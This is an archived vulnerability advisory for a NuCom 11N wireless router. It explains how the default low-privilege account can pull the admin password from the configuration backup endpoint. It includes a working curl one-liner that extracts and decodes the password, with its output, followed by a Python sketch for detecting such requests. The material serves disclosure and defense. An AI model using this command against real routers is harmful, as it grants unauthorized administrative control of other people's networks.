NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation

Published: 10 Mar 2021 00:00:00
Reported by: Gjoko Krstic
Type: zeroscience
Source: www.zeroscience.mk

NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation vulnerability. Non-privileged user can elevate privileges via HTTP reques

Related

Reporter | Title | Published
Circl | CVE-2021-47726 | 31 Dec 2025 21:43
CNNVD | NuCom 11N Security Vulnerability | 31 Dec 2025 00:00
CVE | CVE-2021-47726 | 31 Dec 2025 18:39
Cvelist | CVE-2021-47726 NuCom 11N Wireless Router 5.07.90 Privilege Escalation via Configuration Backup | 31 Dec 2025 18:39
EUVD | EUVD-2025-206084 | 31 Dec 2025 21:30
NVD | CVE-2021-47726 | 31 Dec 2025 19:15
Positive Technologies | PT-2025-54420 | 31 Dec 2025 00:00
Vulnrichment | CVE-2021-47726 NuCom 11N Wireless Router 5.07.90 Privilege Escalation via Configuration Backup | 31 Dec 2025 18:39

<html><body><p>NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation


Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
Product web page: https://www.nucom.es
Affected version: 5.07.90_multi_NCM01
                  5.07.89_multi_NCM01
                  5.07.72_multi_NCM01

Summary: The NC routers upgrade your network to the next
generation of WiFi. With combined wireless speeds of up to
1750 Mbps, the device provides better speeds and wireless
range. Includes 2 FXS ports for any VoIP service. If you
prefer a wired connection, the NC routers have gigabit
ports to provide an incredibly fast, lag-free experience.
3.0 ports allow you to power a robust home Internet network
by sharing printers, flash storage, FTP servers, or media
players.

Desc: The application suffers from a privilege escalation
vulnerability. The non-privileged default user (user:user)
can elevate his/her privileges by sending an HTTP GET request
to the configuration backup endpoint, which discloses the HTTP
super password (admin credentials) as a Base64-encoded value.
Once authenticated as admin, an attacker is granted access
to the additional, privileged pages.

Tested on: GoAhead-Webs
           Tenda


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5629
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php


01.03.2021

--


lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
&gt; curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
&gt; -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
&gt; grep -oP '(?&lt;=http_supper_passwd=).*' | \
&gt; base64 -d 2&gt;/dev/null | \
&gt; xargs echo -n ; \
&gt; echo -e '\n-----------\n'
The admin password is: 
MammaMia123
-----------

lqwrm@metalgear:~/prive$
</p></body></html>
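
A detection sketch for the request pattern the advisory describes, added here as an example and not part of the original advisory or any vendor code: it flags GET requests to the configuration backup endpoint and raises the severity when the `ecos_pw` cookie decodes to the default `user` password. The record layout, the sample records and the cookie format (Base64 password followed by digits, inferred from the single request above) are assumptions.

```python
import base64
import re
from urllib.parse import urlsplit

# Backup endpoint path, taken from the request shown in the advisory.
BACKUP_PATH = "/cgi-bin/DownloadNoMacaddrCfg/"
# Assumption from the one cookie on the page: Base64 text, then a numeric suffix.
COOKIE_RE = re.compile(r"ecos_pw=([A-Za-z0-9+/]+={0,2})(\d*)")
LOW_PRIV_PASSWORDS = {"user"}  # default non-privileged account (user:user)

# Constructed sample records, e.g. as exported from a proxy or packet capture.
SAMPLE_RECORDS = [
    {"src": "192.168.0.23", "method": "GET", "cookie": "ecos_pw=dXNlcg==1311930653:language=en",
     "uri": "/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251"},
    {"src": "192.168.0.23", "method": "GET", "cookie": "ecos_pw=dXNlcg==1311930653:language=en",
     "uri": "/index.asp"},
    {"src": "192.168.0.10", "method": "GET", "cookie": "ecos_pw=Y29uc3RydWN0ZWQ=42:language=en",
     "uri": "/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.7"},
    {"src": "192.168.0.55", "method": "GET", "cookie": None,
     "uri": "/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg"},
]


def decode_ecos_pw(cookie_header):
    """Return the password carried in ecos_pw, or None if absent or undecodable."""
    m = COOKIE_RE.search(cookie_header or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None  # unpadded values are ambiguous with the numeric suffix


def classify(record):
    """Return 'high', 'review' or None for one HTTP request record."""
    path = urlsplit(record["uri"]).path
    if record["method"] != "GET" or not path.startswith(BACKUP_PATH):
        return None
    if decode_ecos_pw(record.get("cookie")) in LOW_PRIV_PASSWORDS:
        return "high"    # default low-privilege session exported the full config
    return "review"      # export by another or unidentifiable session


def scan(records):
    """Return (source, severity) for every record that touches the backup endpoint."""
    return [(r["src"], sev) for r in records if (sev := classify(r))]
```
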
